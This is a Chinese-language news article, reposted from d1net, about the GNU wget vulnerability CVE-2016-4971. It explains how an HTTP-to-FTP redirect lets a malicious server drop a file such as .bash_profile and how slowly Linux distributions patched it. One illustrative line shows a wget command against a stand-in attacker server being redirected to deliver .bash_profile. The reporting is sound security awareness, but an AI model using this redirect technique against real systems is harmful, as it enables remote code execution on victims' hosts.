所有Linux发行版仍未修复严重的GNU wget漏洞

简介:

 先前,安全研究员Dawid GolunskiSecuriTeam曝出GNU wget漏洞69日,GNU wget项目发布文件下载包新版1.18修复漏洞。

CVE-2016-4971 漏洞回顾

GUN wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议,当使用wget 下载文件时,若初始下载http服务提供的下载资源, 如果服务器将下载资源重定向到ftp服务时,wget 会默认信赖http服务器重定向的ftp 链接地址和文件名,而不做二次验证。从而可能下载到恶意钓鱼者的恶意文件,导致主机被入侵。

将近一个月后,包含GNU wget标准包的所有Linux发行版仍未修复被曝漏洞(CVE-2016-4971)。

GNU wget漏洞导致远程代码执行

安全研究员Dawid Golunski在公告中解释道,恶意攻击者能诱骗wget文件下载过程在Linux设备上执行代码。

Dawid Golunski通过电子邮件告诉外媒,“攻击者可能潜在滥用漏洞上传任意文件并执行代码。”

GNU wget是从网络上自动下载文件的Linux命令行实用工具。如果链接发生变化,GNU wget支持URL重定向。

当重定向到FTP链接时,GNU wget不重命名文件

Golunski发现,当从最初的HTTP URL重定向到FTP链接时,wget不能正确处理文件名。

比 如,如果攻击者通过wget控制定期下载文件的服务器,攻击者可以使用302重定向文件。运行wget http://attackers-server/safe_file.txt命令的用户将被重定向到下载ftp://attackers-server /.bash_profile。

在正常的HTTP重定向到HTTP中,为了防止远程代码执行(Remote Code Execution,缩写RCE),GNU wget将以原始文件名重命名第二个文件(.bash_profile to safe_file.txt)。然而,从HTTP重定向到FTP链接时,wget不包含该安全机制。这个问题影响打补丁1.18版本之前的所有GNU wget版本。

因为wget命令经常用于大多数时候自动执行下载文件的脚本中,这就让攻击者有了可乘之机。所有系统管理员应审查将wget作为首选下载内容的Cronjobs。

受影响的Linux发行版迟迟未修复

虽然GNU wget项目履行了自己的职责,但一些Linux发行版却未及时更新。Golunski表示,只有Ubuntu将GNU wget1.18(如wget 1.17-1)包含在wget发行版更新中。Arch Linux等发行版自6月中旬就已修复了该问题。

另一热门Linux OS—Debian特别配备了网络专家修复该问题。Wget 1.18目前包含在最新“测试”和“不稳定”版本中。

另一方面,Red Hat已经推迟修复7.x中存在的该问题,同时还宣布未修复旧版6.x和5.x版本中的wget问题。

虽然CVE-2016-4971安全隐患较高,但打补丁的速度也比较慢。

研究人员通过电子邮件告诉外媒,“重要的是,wget发布了已经发布了新版1.18,因此,如果用户受影响且希望得到安全保障,他们可以下载官方资源。”

Golunski和SecuriTeam已经发布了安全公告,内容包含漏洞与概念验证详情,以提高对问题的认识。





====================================分割线================================


本文转自d1net(转载)

目录
相关文章
|
4月前
|
Unix Linux 测试技术
Linux系统之wget命令的基本使用
【8月更文挑战第4天】Linux系统之wget命令的基本使用
167 5
|
1月前
|
安全 算法 Linux
Linux 服务器还有漏洞?建议使用 OpenVAS 日常检查!
在数字化时代,Linux 服务器的安全至关重要。OpenVAS 是一款优秀的开源漏洞扫描工具,可以帮助及时发现并修复服务器中的安全隐患。本文将介绍 OpenVAS 的主要功能、使用方法及应对漏洞的措施,帮助用户加强服务器安全管理,确保企业数字化安全。
59 7
|
2月前
|
存储 安全 Linux
|
4月前
|
监控 Linux
在Linux中,如何创建、检查和修复文件系统?
在Linux中,如何创建、检查和修复文件系统?
|
4月前
|
Web App开发 缓存 Ubuntu
Linux中yum、rpm、apt-get、wget的区别,yum、rpm、apt-get常用命令,CentOS、Ubuntu中安装wget
Linux中yum、rpm、apt-get、wget的区别,yum、rpm、apt-get常用命令,CentOS、Ubuntu中安装wget
235 11
|
3月前
|
Linux
Linux内核的异常修复原理
Linux内核的异常修复原理
|
5月前
|
弹性计算 安全 Linux
云服务器 ECS产品使用问题之如何处理Linux软件漏洞
云服务器ECS(Elastic Compute Service)是各大云服务商阿里云提供的一种基础云计算服务,它允许用户租用云端计算资源来部署和运行各种应用程序。以下是一个关于如何使用ECS产品的综合指南。
|
4月前
|
Unix Linux 开发者
在Linux中,什么是GPL、GNU,自由由软件?
在Linux中,什么是GPL、GNU,自由由软件?
|
4月前
|
监控 Linux
在Linux中,如何检测并修复/dev/hda5?
在Linux中,如何检测并修复/dev/hda5?
|
4月前
|
NoSQL Linux Shell
在Linux中,GNU项目的重要性是什么?
在Linux中,GNU项目的重要性是什么?